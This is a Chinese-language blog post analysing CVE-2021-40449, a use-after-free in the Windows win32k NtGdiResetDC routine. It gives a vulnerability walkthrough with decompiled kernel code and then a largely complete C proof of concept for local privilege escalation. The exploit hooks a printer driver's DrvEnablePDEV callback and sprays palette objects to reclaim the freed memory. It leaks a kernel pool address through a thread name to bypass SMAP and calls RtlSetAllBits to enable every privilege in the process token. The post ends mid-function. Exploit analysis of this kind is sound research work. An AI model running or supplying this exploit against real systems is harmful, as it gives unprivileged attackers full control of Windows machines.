CVE-2021-40449 分析

最新推荐文章于 2025-07-06 15:26:02 发布

飞鸿踏雪（蓝屏选手）

最新推荐文章于 2025-07-06 15:26:02 发布

阅读量2k

点赞数

CC 4.0 BY-SA版权

分类专栏：提权总结漏洞复现与分析文章标签： c语言安全网络安全

本文链接：https://blog.youkuaiyun.com/qq_41252520/article/details/123716934

总结同时被 3 个专栏收录

47 篇文章

订阅专栏

漏洞复现与分析

20 篇文章

订阅专栏

提权

14 篇文章

订阅专栏

本文详细分析了一个Win10下的Use-After-Free（UAF）漏洞，该漏洞存在于win32kfull.sys的NtGdiResetDC函数中，可能导致本地权限提升。攻击者通过HOOK DrvEnablePDEV回调函数，利用调色板堆喷技术，构造特定内存布局，然后触发UAF，最终利用RtlSetAllBits函数修改Token权限以实现提权。文章还介绍了如何通过ZwQuerySystemInformation和NtSetInformationThread绕过SMAP，以及详细的复现步骤和POC代码。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

前言

该漏洞本身原理比较简单，而作为 Win10下的利用才是本篇文章的研究重点。

1.漏洞简介

1.1.漏洞描述

win32kfull.sys中的 $NtGdiResetDC\textcolor{cornflowerblue}{NtGdiResetDC}$ 函数存在 UAF漏洞，攻击者可以利用该漏洞进行本地权限提升。

1.2.影响版本

windows_10
windows_10 20h2
windows_10 21h1
windows_10 1607
windows_10 1809
windows_10 1909
windows_10 2004
windows_11
windows_7 - sp1
windows_8.1 
windows_rt_8.1
windows_server 20h2
windows_server 2004
windows_server_2008 - sp2
windows_server_2008 r2
windows_server_2012
windows_server_2012 r2
windows_server_2016
windows_server_2019
windows_server_2022

1.3.危害等级

7.8 | 高危

2.漏洞分析

2.1.漏洞起因

用户层通过调用函数 $ResetDC\textcolor{cornflowerblue}{ResetDC}$ ，进入到内核层 $NtGdiResetDC\textcolor{cornflowerblue}{NtGdiResetDC}$ -> $GreResetDCInternal\textcolor{cornflowerblue}{GreResetDCInternal}$ ，主要漏洞点：

__int64 __usercall GreResetDCInternal@<rax>(HDC hdc@<rcx>, __int64 pdmw@<rdx>, int *a3@<r8>)
{
 	...			
    hdc_1 = hdc;
 	DCOBJ::DCOBJ((DCOBJ *)&dcobj, hdc);
	dcobj_1 = dcobj;
    ...
    pdevob = *(_QWORD *)(dcobj_1 + 0x30); // 从旧的DC对象中获取dev
    if ( *(_DWORD *)(pdevob + 0x20) == 1 )
    {
      // 创建新的DC
      hdcNew = (HDC)hdcOpenDCW(&qword_1C0141EB0, pdmw_1, 0i64, 0i64, *(_QWORD *)(pdevob + 0xA18));
      hdcNew_1 = hdcNew;
      if ( hdcNew )
      {
        *(_QWORD *)(pdevob + 0xA18) = 0i64;
        DCOBJ::DCOBJ((DCOBJ *)&dco, hdcNew);
        v14 = (_QWORD *)dco;
        if ( dco )
        {
          if ( v12 )
            *(_DWORD *)(dco + 0x78) = *(_DWORD *)(dco + 0x74);
          v14[308] = *(_QWORD *)(dcobj + 0x9A0);
          *(_QWORD *)(dcobj + 0x9A0) = 0i64;
          v14[309] = *(_QWORD *)(dcobj + 0x9A8);
          *(_QWORD *)(dcobj + 0x9A8) = 0i64;
          v15 = *(void (__fastcall **)(_QWORD, _QWORD))(pdevob + 0xAD0);// 函数是 UMPDDrvResetPDEV
          if ( v15 )
            v15(*(_QWORD *)(pdevob + 0x720), *(_QWORD *)(v14[6] + 0x720i64));// 函数调用
          GreAcquireHmgrSemaphore();
          LOBYTE(v23) = 1;
          HmgSwapLockedHandleContents(hdc_1, 0i64, hdcNew_1, 0i64, v23);// 交换新旧DC句柄内容
          GreReleaseHmgrSemaphore();
          v7 = 1;
        }
        else
        {
          EngSetLastError((unsigned int)(dco + 6));
        }
        XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dco);
      }
    }
    ...
LABEL_21:
  XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dcobj);// 解锁旧的 dc对象
  if ( v7 )
  {
    bDeleteDCInternal(hdcNew_1, 1i64, 0i64); // 由于之前已经交换了句柄，所以这里释放的是旧的DC
    DCOBJ::DCOBJ((DCOBJ *)&dcobj, hdc_1);	
    v16 = dcobj;
    if ( !dcobj )
    {
      EngSetLastError((unsigned int)(dcobj + 6));
LABEL_24:
      v7 = 0;
LABEL_38:
      XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dcobj);// 解锁新的 DC对象
      return v7;
    }
    ...
  }
  ...
}

line:11 $hdcOpenDCW\textcolor{cornflowerblue}{hdcOpenDCW}$ 函数内部会调用一个位于用户层的回调 $DrvEnablePDEV\textcolor{cornflowerblue}{DrvEnablePDEV}$ ，具体调用链：
- $hdcOpenDCW\textcolor{cornflowerblue}{hdcOpenDCW }$ -> $PDEVOBJ::PDEVOBJ\textcolor{cornflowerblue}{PDEVOBJ::PDEVOBJ}$ -> $PDEVOBJ::EnablePDEV\textcolor{cornflowerblue}{PDEVOBJ::EnablePDEV}$ -> $DrvEnablePDEV\textcolor{cornflowerblue}{DrvEnablePDEV}$
line:25 从旧的 dev对象中获取函数指针，正常情况下该指针指向的是 $UMPDDrvResetPDEV\textcolor{cornflowerblue}{UMPDDrvResetPDEV}$ ，应该是重置 DEV设备对象。
line:45 从这里开始将释放旧的 DC

从以上分析中可以看出一个问题，因为函数 $hdcOpenDCW\textcolor{cornflowerblue}{hdcOpenDCW}$ 会调用用户层的一个回调函数，所以 DC对象可能易受破坏。函数 $GreResetDCInternal\textcolor{cornflowerblue}{GreResetDCInternal}$ 后面会解锁并释放旧的 DC对象。于是，攻击者可以通过 HOOK用户层中相应的回调函数，再次调用 $ResetDC\textcolor{cornflowerblue}{ResetDC}$ 同一个 DC句柄，这就使得内核重新调用函数 $GreResetDCInternal\textcolor{cornflowerblue}{GreResetDCInternal}$ ，但由于旧的 DC对象已经被释放，而 line:25仍是从旧的 dev对象中获取函数指针，并在 line:29 尝试调用，所以这是一个典型的 UAF漏洞。

3.漏洞利用

3.1.利用流程

在这里插入图片描述

总体利用流程如上图所示。首先在应用层 HOOK函数 $DrvEnablePDEV\textcolor{cornflowerblue}{DrvEnablePDEV}$ ，然后创建一个全局打印机的 DC句柄 hdc，然后 $ResetDC(hdc)\textcolor{orange}{ResetDC(hdc)}$ ，使内核执行函数 $GreResetDCInternal\textcolor{cornflowerblue}{GreResetDCInternal}$ ，并在其回调的过程中再次 $ResetDC(hdc)\textcolor{orange}{ResetDC(hdc)}$ ，使得内核释放打印机的DC对象。利用 Palettes占位被释放掉的 DC对象中 DEV对象的内存，并伪造 DEV的 $UMPDDrvResetPDEV\textcolor{cornflowerblue}{UMPDDrvResetPDEV}$ 函数指针和参数，最终获得一个有限的（只限于接受一个参数，因为另一个参数不可控）任意内核函数调用的原语。 POC使用任意内核函数调用原语调用函数 $RtlSetAllBits\textcolor{cornflowerblue}{RtlSetAllBits}$ 修改 Token的权限实现提权。

$下面将对利用流程中的重点进行分析\textcolor{green}{下面将对利用流程中的重点进行分析}$

3.2.堆喷

3.2.1.利用调色板堆喷的前置知识

系统调色板（Palette）在堆喷中是比较常用到的，用户层调用函数 $CreatePalette\textcolor{cornflowerblue}{CreatePalette}$ 对应的内核服务：

signed __int64 __fastcall NtGdiCreatePaletteInternal(char *a1, unsigned int palNumEntries){
    ...
    if ( *(_WORD *)a1 != 0x300 || !palNumEntries ) 		// palNumEntries 来自应用层
        											// CreatePalette(LOGPALETTE* lPalette)的
        							  				 // lPalette->palNumEntries
        											// 校验lPalette->palVersion 和 lPalette->palNumEntries;
        v2 = 0i64;
    if ( v2 )
  	{
        ...
    	PALMEMOBJ::bCreatePalette(&v5, 1i64, size);
        ...
    }
    ...
}
//////////////////////////////////////////////////////////////////////////////////////

__int64 __fastcall PALMEMOBJ::bCreatePalette(PALMEMOBJ *this, int a2, unsigned int size, unsigned int *a4, unsigned int a5, unsigned int a6, unsigned int a7, unsigned int a8)
{
    ...
    if ( a2 == 1 )
    {
        size = 4 * palNumEntries + 0x90;  				// 调色板对象实际要分配的大小计算方式， 								  			
        v12 = a8 & 0x102F00;
        if ( !palNumEntries )
            return 0i64;
        goto LABEL_11;
    }  
    ...
LABEL_11:
  obj = AllocateObject(size, 8, 0);					   // 分配一个size大小的对象，属于LookasideList管理的分页池的内存
  v14 = (struct _BASEOBJECT *)obj;
  *(_QWORD *)v10 = obj;
  if ( obj )
  {
    ...
    ColorTabl = *(unsigned int **)(*(_QWORD *)v10 + 0x78i64);
    color = v26;											// data来自lPalette->palPalEntry
    if ( v26 )
    {
        for ( i = 0; i < palNumEntries_1; ++i )			  // 向调色板的色彩板中填充颜色
        {
            v23 = *color;
            ++color;
            *ColorTabl = v23;
            ++ColorTabl;
        }
    }
   ...
}

可见调色板的大小和色彩都是可控的，因此可以用来进行堆喷的同时控制内存的数据。但要注意调色板所在内存的类型 @line:31，不是同类型的内存无法使用这种方式去堆喷。

一般用法：

void SprayPalettes(DWORD size){
    WORD palNumEntries = (size-0x90)/4;
    DWORD palSize = sizeof(LOGPALETTE) + (palNumEntries-1)*sizeof(PALETTEENTRY);
    LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize);
    
    PBYTE Color = (PBYTE)Palette+4;
    /*根据你的需要设置Color的内存*/
    lPalette->palNumEntries=palNumEntries;
    lPalette->palVersion=0x300;
    // 根据实际情况可进行若干次如下的操作
    CreatePalette(lPalette);
}

3.2.2.利用调色板占位DC对象内存

首先查看 DEV对象所占的内存大小

在这里插入图片描述

所占内存大小是 0xE30（ $sizeof(DEVOBJ)+sizeof(POOL_HEADER)\textcolor{orange}{sizeof(DEVOBJ)+sizeof(POOL\_HEADER)}$ ）。

调用 $SprayPalettes(0xE20)\textcolor{orange}{SprayPalettes(0xE20)}$ 进行堆喷。

void SprayPalettes(DWORD size) {
	DWORD palCount = (size - 0x90) / 4;
	DWORD palSize = sizeof(LOGPALETTE) + (palCount - 1) * sizeof(PALETTEENTRY);
	LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize);

	if (lPalette == NULL) {
		printf("[Error_%d] SprayPalettes(): Insufficient system resource.\n", __LINE__);
		return;
	}
	
	// lPalette->PaletteEntry
	PCHAR Fake = (PCHAR)lPalette+4;

	// Fake BitmapHeader，不同版本系统需要根据调试做出微调
	ULONG64 BitmapHeader = FakeBitmapHeader() - 1 + 0x10;
	printf("[+] FakeBitmapHeader = %p\n", BitmapHeader);

	/*
		1607:
		*(pdc+0x720) = BitmapHeader
		*(pdc+0xAD0) = RtlSetAllBits
	*/
	((PULONG64)Fake)[0xD7] = BitmapHeader;
	((PULONG64)Fake)[0x14D] = g::RtlSetAllBitsAddress;

	lPalette->palNumEntries = (WORD)palCount;
	lPalette->palVersion = 0x300;

	for(int i=0;i<0x1000;i++)
		CreatePalette(lPalette);
}

3.3.使用函数RtlSetAllBits修改Token的权限

3.3.1.RtlSetAllBits分析

NTSYSAPI VOID RtlSetAllBits(
  [in] PRTL_BITMAP BitMapHeader			// 指向描述位图的 RTL_BITMAP 结构的指针。 此结构必须已由 RtlInitializeBitMap 例程初始化。
);

函数要求一个 PRTL_BITMAP结构的参数，该函数内部实现：

void __stdcall RtlSetAllBits(PRTL_BITMAP BitMapHeader)
{
  unsigned int *v1; // r8
  unsigned __int64 size; // r9

  v1 = BitMapHeader->Buffer;
  // size相当于是BitMapHeader->SizeOfBitMap 以2为底的对数减1，向下取整的结果
  size = (unsigned __int64)(4 * (((BitMapHeader->SizeOfBitMap & 0x1F) != 0) + (BitMapHeader->SizeOfBitMap >> 5))) >> 2;
  if ( size )
  {
    if ( (unsigned __int8)v1 & 4 )
    {
      *v1 = -1;
      if ( !--size )
        return;
      ++v1;
    }
    memset(v1, 0xFFu, 8 * (size >> 1));
    if ( size & 1 )
      v1[size - 1] = -1;
  }
}

瞧，这个函数是多么令人感到惊喜，因为它会将目标内存写入 $8∗(size/2)\textcolor{orange}{8*(size/2)}$ 个 0xFF，这要是目标内存为 $Token−>Privilege\textcolor{orange}{Token->Privilege}$ ，足以使对应的进程获得所有权限！

3.3.2.绕过SMAP伪造PRTL_BITMAP

在 Win8及其之后的系统开启了 SMAP，意味着内核无法直接访问用户态空间下的数据，所以不能直接用位于用户空间的PRTL_BITMAP作为 $RtlSetAllBits\textcolor{cornflowerblue}{RtlSetAllBits}$ 的参数。

前辈给出了一种新的方式——利用函数 $NtSetInformationThread\textcolor{cornflowerblue}{NtSetInformationThread}$ 为一个线程设置名字，该线程的名字会被保存在内核池中，我们将线程名构造成PRTL_BITMAP，自然也就位于内核池中。通过函数 $ZwQuerySystemInformation\textcolor{cornflowerblue}{ZwQuerySystemInformation}$ 泄露内核池地址，我们将得到PRTL_BITMAP的具体位置，这样就绕过了 SMAP。

static DWORD WINAPI  LeakDemoThread(LPVOID lParam) {
	while (TRUE) {
		Sleep(0x1000 * 60 * 60 * 24 * 365);
	}
	return 0;
}

ULONG64 FakeBitmapHeader() {
	HANDLE hThread = INVALID_HANDLE_VALUE;
	DWORD dwThreadID;
	DWORD dwSize = 0x1000;
	PVOID payload = NULL;
	// 创建一个线程并立即挂起
	hThread = CreateThread(NULL, 0, LeakDemoThread, NULL, CREATE_SUSPENDED, &dwThreadID);
	if (hThread == INVALID_HANDLE_VALUE) {
		printf("[Error_%d] CreateThread failed.\n", __LINE__);
		exit(0);
	}

	payload = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
	
	// BitmapHeader->Size
	*(PULONG64)payload = 0x40;
	// BitmapHeader->Buffer
	*(PULONG64)((ULONG64)payload + 8) = GetToken()+0x48;

	UNICODE_STRING uzString;
	uzString.Buffer = (PWCHAR)payload;
	uzString.Length = dwSize;
	uzString.MaximumLength = 0xffff;

	// 将伪造的BitMapHeader结构设置到线程名中，使其位于内核池中，以绕过SMAP保护
	NTSTATUS ntst = g::NtSetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &uzString, sizeof(uzString));
	if (ntst != 0) {
		printf("[Error_%d] NtSetInformationThread failed.n", __LINE__);
		exit(0);
	}

	// 泄露线程名的地址
	dwSize = 0x400*0x400;
	DWORD dwRetSize;

	PSYSTEM_BIGPOOL_INFORMATION SysPoolInfo =
		(PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, dwSize);

	ntst = g::ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, SysPoolInfo, dwSize, &dwRetSize);
	if (ntst != 0) {
		printf("[Error_%d] ZwQuerySystemInformation failed.\n", __LINE__);
		exit(0);
	}

	DWORD DesireSize = uzString.Length + sizeof(uzString);

	for (DWORD i = 0; i < SysPoolInfo->Count; i++) {
		if (!strncmp((char*)SysPoolInfo->AllocatedInfo[i].Tag, "ThNm", 4) &&
			SysPoolInfo->AllocatedInfo[i].SizeInBytes == DesireSize)
		{
			return (ULONG64)SysPoolInfo->AllocatedInfo[i].VirtualAddress;
		}
	}
	return 0;
}

4.复现

4.1.POC

#include<windows.h>
#include<winddi.h>
#include<winspool.h>
#include <winternl.h>
#include <stdio.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib ")

#define STATUS_INFO_LENGTH_MISMATCH  ((NTSTATUS)0xC0000004L) 

#define ThreadNameInformation 0x26
#define SystemExtendedHandleInformation  64
#define SystemBigPoolInformation 66

using ZwQuerySystemInformation_t = NTSTATUS(*)(
	SYSTEM_INFORMATION_CLASS SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength);

using NtSetInformationThread_t = NTSTATUS(*)(
	HANDLE threadHandle,
	THREADINFOCLASS threadInformationClass,
	PVOID threadInformation,
	ULONG threadInformationLength);


using DrvEnableDriver_t = BOOL(*)(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);

using DrvEnablePDEV_t = DHPDEV(*)(DEVMODEW* pdm,
	LPWSTR pwszLogAddress,
	ULONG cPat,
	HSURF* phsurfPatterns,
	ULONG cjCaps,
	ULONG* pdevcaps,
	ULONG cjDevInfo,
	DEVINFO* pdi,
	HDEV hdev,
	LPWSTR pwszDeviceName,
	HANDLE hDriver);

using DrvEnablePDEV_t = DHPDEV(*)(DEVMODEW* pdm,
LPWSTR pwszLogAddress,
ULONG cPat,
HSURF* phsurfPatterns,
ULONG cjCaps,
ULONG* pdevcaps,
ULONG cjDevInfo,
DEVINFO* pdi,
HDEV hdev,
LPWSTR pwszDeviceName,
HANDLE hDriver);

using DrvDisableDriver_t = void(*)();

typedef struct _SYSTEM_BIGPOOL_ENTRY
{
	union
	{
		PVOID VirtualAddress;
		ULONG_PTR NonPaged : 1;     // Set to 1 if entry is nonpaged.
	};
	SIZE_T SizeInBytes;
	union
	{
		UCHAR Tag[4];
		ULONG TagUlong;
	};
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;

typedef struct _SYSTEM_BIGPOOL_INFORMATION
{
	ULONG Count;
	SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;

typedef struct _SYSTEM_HANDLE
{
	PVOID Object;
	HANDLE UniqueProcessId;
	HANDLE HandleValue;
	ULONG GrantedAccess;
	USHORT CreatorBackTraceIndex;
	USHORT ObjectTypeIndex;
	ULONG HandleAttributes;
	ULONG Reserved;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
	ULONG_PTR HandleCount;
	ULONG_PTR Reserved;
	SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;



namespace g {
	DrvEnablePDEV_t OldDrvEnablePDEV = 0;
	DrvEnableDriver_t DrvEnableDriver = 0;
	DrvDisableDriver_t DrvDisableDriver = 0;
	ZwQuerySystemInformation_t ZwQuerySystemInformation = 0;
	NtSetInformationThread_t NtSetInformationThread = 0;
	ULONG64 RtlSetAllBitsAddress = 0;
	PCHAR szKernelName = NULL;
	PCHAR szPrinterName = NULL;
	HANDLE hToken=INVALID_HANDLE_VALUE;
	ULONG64 KernelBase = 0;
	bool bIsTrigger = false;
	HDC hdc = 0;
};

void Hook_DrvEnablePDEV();
ULONG64 GetKernelBase();
bool Init();
ULONG64 GetToken();
DHPDEV DrvEnablePDEV_Proxy(
	DEVMODEW* pdm,
	LPWSTR   pwszLogAddress,
	ULONG    cPat,
	HSURF* phsurfPatterns,
	ULONG    cjCaps,
	ULONG* pdevcaps,
	ULONG    cjDevInfo,
	DEVINFO* pdi,
	HDEV     hdev,
	LPWSTR   pwszDeviceName,
	HANDLE   hDriver);
void Hook_DrvEnablePDEV();
static DWORD WINAPI  LeakDemoThread(LPVOID lParam);
ULONG64 FakeBitmapHeader();
void SprayPalettes(DWORD size);
bool CheckPrivilege(HANDLE TokenHandle);
DWORD getProcessId(const char* name);
void SpawnShell();

ULONG64 GetKernelBase() {
	DWORD cReturn=0;
	char szDevName[MAX_PATH] = { 0 };
	ULONG64 KernelBase = 0;

	EnumDeviceDrivers(NULL, 0, &cReturn);
	if (cReturn <= 0) {
		printf("[Error_%d] GetKernelBase(): EnumDeviceDrivers failed.\n", __LINE__);
		exit(-1);
	}

	PULONG64 DevList = (PULONG64)GlobalAlloc(GMEM_ZEROINIT, cReturn);
	if (DevList == NULL) {
		printf("[Error_%d] GetKernelBase(): Insufficient system resource.\n", __LINE__);
		exit(-1);
	}

	if (!EnumDeviceDrivers((LPVOID*)DevList, cReturn, &cReturn)) {
		printf("[Error_%d] GetKernelBase(): EnumDeviceDrivers failed.\n", __LINE__);
		exit(-1);
	}

	for (DWORD i = 0; i < cReturn / sizeof(DevList[0]); i++)
	{
		if (GetDeviceDriverBaseNameA((LPVOID)DevList[i], szDevName, MAX_PATH)) {
			char* LowerName = _strlwr(szDevName);
			if (!strncmp(LowerName, "nt",2)) {
				KernelBase = DevList[i];
				g::szKernelName = strdup(szDevName);
				break;
			}
		}
	}
	free(DevList);
	return KernelBase;
}

bool Init() {
	HMODULE hNt = LoadLibraryA("ntdll");
	if (hNt == NULL) {
		printf("[Error_%d] Init(): Can't find ntdll.",__LINE__);
		return FALSE;
	}
	g::ZwQuerySystemInformation = (ZwQuerySystemInformation_t)GetProcAddress(hNt, "NtQuerySystemInformation");
	g::NtSetInformationThread = (NtSetInformationThread_t)GetProcAddress(hNt, "NtSetInformationThread");
	if (g::NtSetInformationThread == NULL || g::ZwQuerySystemInformation == NULL) {
		printf("[Error_%d] Init(): Can't find target func.\n", __LINE__);
		return FALSE;
	}
	 g::KernelBase = GetKernelBase();

	 HMODULE hKernel = LoadLibraryA(g::szKernelName);

	 if (hKernel == NULL) {
		 printf("[Error_%d] Init(): Can't find %s.", __LINE__, g::szKernelName);
		 return FALSE;
	 }

	 ULONG64 RtlSetAllBitsProc = (ULONG64)GetProcAddress(hKernel, "RtlSetAllBits");
	 if (RtlSetAllBitsProc==0) {
		 printf("[Error_%d] Init(): Can't find target func.\n", __LINE__);
		 return FALSE;
	 }

	g::RtlSetAllBitsAddress = RtlSetAllBitsProc - (ULONG64)hKernel + g::KernelBase;
	printf("[+] Found RtlSetAllBitsAddress = %p\n", g::RtlSetAllBitsAddress);

	return TRUE;
}

ULONG64 GetToken() {
	PSYSTEM_HANDLE_INFORMATION_EX sys_handle_info_ref = NULL;
	ULONG64 Token = 0;
	ULONG len = 20;
	NTSTATUS ntst = 0;

	OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &g::hToken);
	if (g::hToken == INVALID_HANDLE_VALUE) {
		printf("[Error_%d] GetToken(): OpenProcessToken failed.\n", __LINE__);
		return 0;
	}
	//获取本进程的EPROCESS
	do {
		len *= 2;
		sys_handle_info_ref = (PSYSTEM_HANDLE_INFORMATION_EX)realloc(sys_handle_info_ref, len);
		ntst = g::ZwQuerySystemInformation(
			(SYSTEM_INFORMATION_CLASS)SystemExtendedHandleInformation, sys_handle_info_ref, len, &len);
	} while (ntst == STATUS_INFO_LENGTH_MISMATCH);

	if (ntst != 0) {
		printf("[Error_%d] GetToken(): ZwQuerySystemInformation failed.\n", __LINE__);
		if (sys_handle_info_ref)
			free(sys_handle_info_ref);
		return 0;
	}

	DWORD pid = GetCurrentProcessId();
	for (int i = 0; i < sys_handle_info_ref->HandleCount; i++) {
		if (g::hToken == sys_handle_info_ref->Handles[i].HandleValue
			&& (HANDLE)pid == sys_handle_info_ref->Handles[i].UniqueProcessId) {
			Token = (ULONG64)sys_handle_info_ref->Handles[i].Object;
			break;
		}
	}

	if (sys_handle_info_ref)
		free(sys_handle_info_ref);

	printf("[+] Found current process token = %p\n",Token);
	return Token;
}

DHPDEV DrvEnablePDEV_Proxy(
	DEVMODEW* pdm,
	LPWSTR   pwszLogAddress,
	ULONG    cPat,
	HSURF* phsurfPatterns,
	ULONG    cjCaps,
	ULONG* pdevcaps,
	ULONG    cjDevInfo,
	DEVINFO* pdi,
	HDEV     hdev,
	LPWSTR   pwszDeviceName,
	HANDLE   hDriver) {

	DHPDEV res;

	printf("[+] DrvEnablePDEV_Proxy called.\n");
	res = g::OldDrvEnablePDEV(pdm, pwszLogAddress, cPat, phsurfPatterns, cjCaps, pdevcaps, cjDevInfo, pdi, hdev, pwszDeviceName, hDriver);
	if (g::bIsTrigger) {
		// 释放hdc
		g::bIsTrigger = FALSE;
		ResetDC(g::hdc, NULL);
		// UAF
		SprayPalettes(0xE20);
	}
	return res;
}

void Hook_DrvEnablePDEV() {
	DWORD cbBuf = 0;
	DWORD cbNeed,cReturned;
	PPRINTER_INFO_4 PrintInfo=NULL;
	DRVENABLEDATA DrvData;
	DWORD OldProtect;
	HANDLE hPrinter = INVALID_HANDLE_VALUE;

	//首先枚举本地安装的打印机，找到可用的
	EnumPrintersA(PRINTER_ENUM_LOCAL, NULL, 4, NULL, 0, &cbNeed, &cReturned);
	if (cbNeed <= 0) {
		printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find available printer.\n", __LINE__);
		exit(-1);
	}
	PrintInfo = (PPRINTER_INFO_4)GlobalAlloc(GMEM_ZEROINIT, cbNeed);
	if (PrintInfo == NULL) {
		printf("[Error_%d] Hook_DrvEnablePDEV(): Insufficient system resource.\n", __LINE__);
		exit(-1);
	}
	if (!EnumPrintersA(PRINTER_ENUM_LOCAL, NULL, 4, (PBYTE)PrintInfo, cbNeed, &cbNeed, &cReturned)
		|| cReturned<=0) {
		printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find available printer.\n", __LINE__);
		exit(-1);
	}
	
	// 循环查找打印机
	for (DWORD i = 0; i < cReturned; i++) {
		if (!OpenPrinterA(PrintInfo[i].pPrinterName, &hPrinter, NULL)) {
			printf("[Error_%d] Hook_DrvEnablePDEV(): OpenPrinterA failed.\n", __LINE__);
			continue;
		}
		else {
			printf("[+] Using a available printer: %s.\n", PrintInfo[i].pPrinterName);
			g::szPrinterName = strdup(PrintInfo[i].pPrinterName);
			
			// 获取打印机驱动文件名
			GetPrinterDriverA(hPrinter, NULL, 2, NULL, NULL, &cReturned);
			if (cReturned <= 0) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): GetPrinterDriverA failed.\n", __LINE__);
				continue;
			}
			PDRIVER_INFO_2 DrvInfo = (PDRIVER_INFO_2)GlobalAlloc(GMEM_ZEROINIT, cReturned);
			if (DrvInfo == NULL) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): Insufficient system resource.\n", __LINE__);
				continue;
			}

			if (!GetPrinterDriverA(hPrinter, NULL, 2, (PBYTE)DrvInfo, cReturned, &cReturned) ||
				cReturned <= 0) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): GetPrinterDriverA failed.\n", __LINE__);
				continue;
			}

			HMODULE hPrinterDrv = LoadLibraryExA(DrvInfo->pDriverPath, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
			if (hPrinterDrv == NULL) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): LoadLibraryExA failed.\n", __LINE__);
				continue;
			}

			g::DrvEnableDriver = (DrvEnableDriver_t)GetProcAddress(hPrinterDrv, "DrvEnableDriver");
			g::DrvDisableDriver = (DrvDisableDriver_t)GetProcAddress(hPrinterDrv, "DrvDisableDriver");
			if (g::DrvEnableDriver == NULL || g::DrvDisableDriver == NULL) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find target functions .\n", __LINE__);
				continue;
			}
			// 打开图形驱动，获取回调函数列表，里面有我们要HOOK的函数
			if (!g::DrvEnableDriver(DDI_DRIVER_VERSION_NT4, sizeof(DRVENABLEDATA), &DrvData)) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): DrvEnableDriver failed.\n", __LINE__);
				continue;
			}

			if (!VirtualProtect(DrvData.pdrvfn, DrvData.c * sizeof(PFN), PAGE_READWRITE, &OldProtect))
			{
				printf("[Error_%d] Hook_DrvEnablePDEV(): VirtualProtect failed.\n", __LINE__);
				continue;
			}

			for (DWORD i = 0; i < DrvData.c; i++) {
				if (DrvData.pdrvfn[i].iFunc == INDEX_DrvEnablePDEV) {
					// 保存并HOOK
					g::OldDrvEnablePDEV = (DrvEnablePDEV_t)DrvData.pdrvfn[i].pfn;
					DrvData.pdrvfn[i].pfn = (PFN)DrvEnablePDEV_Proxy;
					break;
				}
			}
		}
		// 关闭图形驱动
		g::DrvDisableDriver();
		VirtualProtect(DrvData.pdrvfn, DrvData.c * sizeof(PFN), OldProtect, &OldProtect);

		return;
	}
	
}

static DWORD WINAPI  LeakDemoThread(LPVOID lParam) {
	while (TRUE) {
		Sleep(0x1000 * 60 * 60 * 24 * 365);
	}
	return 0;
}

ULONG64 FakeBitmapHeader() {
	HANDLE hThread = INVALID_HANDLE_VALUE;
	DWORD dwThreadID;
	DWORD dwSize = 0x1000;
	PVOID payload = NULL;

	hThread = CreateThread(NULL, 0, LeakDemoThread, NULL, CREATE_SUSPENDED, &dwThreadID);
	if (hThread == INVALID_HANDLE_VALUE) {
		printf("[Error_%d] CreateThread failed.\n", __LINE__);
		exit(0);
	}

	payload = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
	
	// BitmapHeader->Size
	*(PULONG64)payload = 0x40;
	// BitmapHeader->Buffer
	*(PULONG64)((ULONG64)payload + 8) = GetToken()+0x48;

	UNICODE_STRING uzString;
	uzString.Buffer = (PWCHAR)payload;
	uzString.Length = dwSize;
	uzString.MaximumLength = 0xffff;

	// 将伪造的BitMapHeader结构设置到线程名中，使其位于内核池中，以绕过SMAP保护
	NTSTATUS ntst = g::NtSetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &uzString, sizeof(uzString));
	if (ntst != 0) {
		printf("[Error_%d] NtSetInformationThread failed.\n", __LINE__);
		exit(0);
	}

	// 泄露线程名的地址
	dwSize = 0x400*0x400;
	DWORD dwRetSize;

	PSYSTEM_BIGPOOL_INFORMATION SysPoolInfo =
		(PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, dwSize);

	ntst = g::ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, SysPoolInfo, dwSize, &dwRetSize);
	if (ntst != 0) {
		printf("[Error_%d] ZwQuerySystemInformation failed.\n", __LINE__);
		exit(0);
	}

	DWORD DesireSize = uzString.Length + sizeof(uzString);

	for (DWORD i = 0; i < SysPoolInfo->Count; i++) {
		if (!strncmp((char*)SysPoolInfo->AllocatedInfo[i].Tag, "ThNm", 4) &&
			SysPoolInfo->AllocatedInfo[i].SizeInBytes == DesireSize)
		{
			return (ULONG64)SysPoolInfo->AllocatedInfo[i].VirtualAddress;
		}
	}
	return 0;
}

void SprayPalettes(DWORD size) {
